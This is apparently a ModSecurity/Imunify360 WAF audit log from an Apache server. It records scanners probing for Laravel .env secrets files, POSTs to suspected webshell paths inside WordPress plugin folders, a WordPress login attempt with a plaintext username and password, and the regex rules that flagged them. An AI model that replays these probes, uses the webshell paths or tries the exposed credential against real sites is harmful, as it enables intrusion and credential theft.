Server: Apache Engine-Mode: "ENABLED" --5efbf42d-Z-- --5efbf42d-A-- [30/Jun/2025:16:28:27.525931 +0530] aGJt06bBThX8qGqBndJiqQAAADo 20.171.207.232 46854 192.168.74.40 443 --5efbf42d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/js/Rajasthan-Travel-Guides/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5efbf42d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5efbf42d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/js/Rajasthan-Travel-Guides/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/js/Rajasthan-Travel-Guides/privacy-policy.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281107510495 15601 (- - -) Stopwatch2: 1751281107510495 15601; combined=3143, p1=178, p2=2837, p3=0, p4=0, p5=128, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b1428a72-Z-- --162cf259-A-- [30/Jun/2025:16:31:31.285268 +0530] aGJui2CECAzpimnDb-m4-gAAABc 192.253.209.56 49623 192.168.74.40 443 --162cf259-B-- GET /api/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --162cf259-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --162cf259-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281291230366 55213 (- - -) Stopwatch2: 1751281291230366 55213; combined=2022, p1=427, p2=1353, p3=0, p4=0, p5=241, sr=175, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --162cf259-Z-- --74c71f5a-A-- [30/Jun/2025:16:31:31.616193 +0530] aGJui7pDbab8C7BhY4afLQAAAEw 20.171.207.232 55212 192.168.74.40 443 --74c71f5a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/js/parks-sanctuary.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --74c71f5a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --74c71f5a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/js/parks-sanctuary.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/js/parks-sanctuary.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281291599518 16907 (- - -) Stopwatch2: 1751281291599518 16907; combined=4105, p1=141, p2=3815, p3=0, p4=0, p5=149, sr=71, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8486296b-Z-- --162cf259-A-- [30/Jun/2025:16:32:30.862244 +0530] aGJuxpukf1DfSpKy1MccugAAAC4 192.253.209.76 25265 192.168.74.40 443 --162cf259-B-- POST /api/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --162cf259-C-- 0x%5B%5D=DTAB --162cf259-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --162cf259-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281350193034 669663 (- - -) Stopwatch2: 1751281350193034 669663; combined=2829, p1=352, p2=2169, p3=0, p4=0, p5=308, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --162cf259-Z-- --56b6612a-A-- [30/Jun/2025:16:32:31.733699 +0530] aGJuxDJ5JKn4EOxWiuppMQAAAFA 104.238.10.81 54003 192.168.74.40 443 --56b6612a-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --56b6612a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --338a625a-Z-- --23794656-A-- [30/Jun/2025:16:32:42.438771 +0530] aGJu0oeM7ulQx_4iNqO5QQAAADM 192.253.209.62 32121 192.168.74.40 443 --23794656-B-- GET /cp/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --23794656-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --23794656-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281362389886 49289 (- - -) Stopwatch2: 1751281362389886 49289; combined=895, p1=110, p2=573, p3=0, p4=0, p5=212, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --23794656-Z-- --2310d318-A-- [30/Jun/2025:16:32:42.508021 +0530] aGJu0p4tZwI9VhjyFFR7WQAAAEI 20.171.207.232 33346 192.168.74.40 443 --2310d318-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/js/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --2310d318-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2310d318-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/js/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/js/our-services.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281362490113 18197 (- - -) Stopwatch2: 1751281362490113 18197; combined=3444, p1=168, p2=3085, p3=0, p4=0, p5=191, sr=57, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --015bc867-Z-- --b1eacc78-A-- [30/Jun/2025:16:32:43.819571 +0530] aGJu04MA06iX30zibMXSRQAAAE4 192.253.209.92 13761 192.168.74.40 443 --b1eacc78-B-- POST /cp/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --b1eacc78-C-- 0x%5B%5D=DTAB --b1eacc78-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --b1eacc78-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281363665709 154481 (- - -) Stopwatch2: 1751281363665709 154481; combined=2625, p1=318, p2=1885, p3=0, p4=0, p5=422, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b1eacc78-Z-- --253d1f1a-A-- [30/Jun/2025:16:32:43.924727 +0530] aGJu0NrvUYxMGDqiMsYPHgAAAA0 148.135.148.174 56365 192.168.74.40 443 --253d1f1a-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --253d1f1a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --392c2d22-Z-- --d149e436-A-- [30/Jun/2025:16:32:45.216245 +0530] aGJu1YMA06iX30zibMXSRgAAAE4 192.253.209.59 9979 192.168.74.40 443 --d149e436-B-- GET /private/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --d149e436-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d149e436-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281365165025 51597 (- - -) Stopwatch2: 1751281365165025 51597; combined=807, p1=95, p2=526, p3=0, p4=0, p5=186, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d149e436-Z-- --b59cac3b-A-- [30/Jun/2025:16:32:45.412486 +0530] aGJu1drvUYxMGDqiMsYPHwAAAA0 67.205.41.87 46018 192.168.74.40 443 --b59cac3b-B-- POST /wp-content/plugins/elementor/core/common/modules/connect/apps/base.app.php HTTP/1.1 Host: lovedale.us sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="99", "Microsoft Edge";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.30 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 762 Content-Type: application/x-www-form-urlencoded --b59cac3b-C-- secure_access= -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --45b0465f-Z-- --11943e1a-A-- [30/Jun/2025:16:32:46.828968 +0530] aGJu1gC_q2cBiBfjIEBnmwAAABY 192.253.209.76 60443 192.168.74.40 443 --11943e1a-B-- POST /private/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --11943e1a-C-- 0x%5B%5D=DTAB --11943e1a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --11943e1a-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281366784141 44909 (- - -) Stopwatch2: 1751281366784141 44909; combined=1887, p1=206, p2=1279, p3=0, p4=0, p5=401, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --11943e1a-Z-- --0458cd4a-A-- [30/Jun/2025:16:32:47.185664 +0530] aGJu154tZwI9VhjyFFR7XQAAAEI 20.171.207.232 33346 192.168.74.40 443 --0458cd4a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0458cd4a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0458cd4a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/hotels-jodhpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --09458b1d-Z-- --d8226d4c-A-- [30/Jun/2025:16:32:47.939378 +0530] aGJu19rvUYxMGDqiMsYPIAAAAA0 192.253.209.97 21919 192.168.74.40 443 --d8226d4c-B-- GET /system/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --d8226d4c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d8226d4c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281367896444 43328 (- - -) Stopwatch2: 1751281367896444 43328; combined=1008, p1=97, p2=735, p3=0, p4=0, p5=176, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d8226d4c-Z-- --70524120-A-- [30/Jun/2025:16:32:48.236741 +0530] aGJu04eM7ulQx_4iNqO5QgAAADM 23.95.250.240 57185 192.168.74.40 443 --70524120-B-- POST /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 referer: https://thewizblog.com/wp-login.php content-type: application/x-www-form-urlencoded content-length: 144 accept-encoding: gzip, deflate, br cookie: humans_21909=1; wordpress_test_cookie=WP%20Cookie%20check Host: thewizblog.com Connection: close --70524120-C-- log=venessamiller&pwd=Mod%40pk%23pures55&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F&testcookie=1 --70524120-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9f486558-Z-- --5baf7c79-A-- [30/Jun/2025:16:32:49.578203 +0530] aGJu2StJXhRZGlU1BjiMhQAAAAw 192.253.209.61 57301 192.168.74.40 443 --5baf7c79-B-- POST /system/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --5baf7c79-C-- 0x%5B%5D=DTAB --5baf7c79-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --5baf7c79-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281369435272 143362 (- - -) Stopwatch2: 1751281369435272 143362; combined=2376, p1=121, p2=1960, p3=0, p4=0, p5=295, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5baf7c79-Z-- --0ac08b5a-A-- [30/Jun/2025:16:32:49.736314 +0530] aGJu2YeM7ulQx_4iNqO5QwAAADM 192.250.230.81 38264 192.168.74.40 443 --0ac08b5a-B-- POST /wp-content/plugins/metform/core/integrations/onboard/controls/settings/usergroup_5.php HTTP/1.1 Host: lovedale.us Cookie: [encoded cookie payload removed]
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ee854c7a-Z-- --ebe3d27c-A-- [30/Jun/2025:16:32:51.232793 +0530] aGJu2zSFvs-H_7nBXVD83gAAAEo 192.253.209.83 51577 192.168.74.40 443 --ebe3d27c-B-- GET /redmine/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --ebe3d27c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ebe3d27c-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281371166639 66415 (- - -) Stopwatch2: 1751281371166639 66415; combined=1527, p1=201, p2=1115, p3=0, p4=0, p5=211, sr=253, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebe3d27c-Z-- --a9096438-A-- [30/Jun/2025:16:32:51.865265 +0530] aGJu254tZwI9VhjyFFR7YQAAAEI 20.171.207.232 33346 192.168.74.40 443 --a9096438-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/about-us.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a9096438-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a9096438-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/about-us.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
